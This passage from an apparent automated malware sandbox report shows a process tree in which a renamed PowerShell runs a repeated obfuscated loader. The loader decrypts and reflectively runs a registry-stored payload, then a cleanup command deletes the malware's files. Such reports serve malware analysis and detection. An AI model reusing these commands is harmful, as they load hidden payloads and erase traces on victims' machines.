'')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Hide Artifacts: Hidden Window
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:4336
                                                                                                                    • C:\Windows\$sxr-powershell.exe
                                                                                                                      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3896).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Hide Artifacts: Hidden Window
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:1060
                                                                                                                    • C:\Windows\$sxr-powershell.exe
                                                                                                                      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3896).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Hide Artifacts: Hidden Window
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:1400
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /C cd %systemdrive%\Windows\ & taskkill /F /IM $sxr-powershell.exe & taskkill /F /IM $sxr-nircmd.exe & taskkill /F /IM $sxr-Uni.bat.exe & taskkill /F /IM explorer.exe & ping 127.0.0.1 -n 2 > nul & start explorer.exe & PING localhost -n 8 >NUL & ATTRIB -h -s C:\Windows\$sxr-powershell.exe & ATTRIB -h -s %systemdrive%\Windows\$sxr-seroxen1\$sxr-Uni.bat & del /f C:\Windows\$sxr-powershell.exe & del /f %systemdrive%\Windows\$sxr-seroxen1\$sxr-nircmd.exe & del /f %systemdrive%\Windows\$sxr-seroxen1\$sxr-Uni.bat & rmdir /Q /s %systemdrive%\Windows\$sxr-seroxen1 & rmdir /Q /s "\\?\C:\Windows " & exit
                                                                                                                      5⤵
                                                                                                                      • Drops file in Windows directory
                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                      PID:5480
                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        6⤵
                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                        PID:5956
                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                        taskkill /F /IM $sxr-powershell.exe
                                                                                                                        6⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:5892
                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                        taskkill /F /IM $sxr-nircmd.exe
                                                                                                                        6⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:632
                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                        taskkill /F /IM $sxr-Uni.bat.exe
                                                                                                                        6⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:3564
                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                        taskkill /F /IM explorer.exe
                                                                                                                        6⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:4628
                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                        ping 127.0.0.1 -n 2
                                                                                                                        6⤵
                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                        • Runs ping.exe
                                                                                                                        PID:2888
                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                        explorer.exe
                                                                                                                        6⤵
                                                                                                                        • Boot or Logon Autostart Execution: Active Setup
                                                                                                                        • Enumerates connected drives
                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                        • Modifies registry class
                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                        PID:3276
                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                        PING localhost -n 8
                                                                                                                        6⤵
                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                        • Runs ping.exe
                                                                                                                        PID:4288
                                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                                        ATTRIB -h -s C:\Windows\$sxr-powershell.exe
                                                                                                                        6⤵
                                                                                                                        • Drops file in Windows directory
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:5176
                                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                                        ATTRIB -h -s C:\Windows\$sxr-seroxen1\$sxr-Uni.bat
                                                                                                                        6⤵
                                                                                                                        • Drops file in Windows directory
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:4888
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"
                                                                                                                    4⤵
                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                    PID:5776
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      5⤵
                                                                                                                        PID:6016
                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                        PING localhost -n 8
                                                                                                                        5⤵
                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                        • Runs ping.exe
                                                                                                                        PID:5580
                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                        taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"
                                                                                                                        5⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:4376
                                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                                        ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"
                                                                                                                        5⤵
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:5988
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                1⤵
                                                                                                                  PID:3684
                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                  1⤵
                                                                                                                    PID:3864
                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                    1⤵
                                                                                                                    • Modifies registry class
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:4024
                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:3944
                                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                      1⤵
                                                                                                                        PID:4620
                                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                        1⤵
                                                                                                                          PID:1020
                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                          1⤵
                                                                                                                            PID:400
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                            1⤵
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            PID:1660
                                                                                                                          • C:\Windows\system32\SppExtComObj.exe
                                                                                                                            C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                            1⤵
                                                                                                                              PID:4744
                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                              C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                              1⤵
                                                                                                                                PID:3696
                                                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                1⤵
                                                                                                                                • Drops file in System32 directory
                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                PID:404
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                1⤵
                                                                                                                                  PID:1976
                                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                  1⤵
                                                                                                                                    PID:4224
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                    1⤵
                                                                                                                                      PID:4008
                                                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                      1⤵
                                                                                                                                        PID:808
                                                                                                                                      • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                                        C:\Windows\System32\WaaSMedicAgent.exe 0f60212eff24ead9904eff0f3b3eaf23 XtO41UIMOEOdtXJzydsTNw.0.1.0.0.0
                                                                                                                                        1⤵
                                                                                                                                          PID:4344
                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            2⤵
                                                                                                                                              PID:3152
                                                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
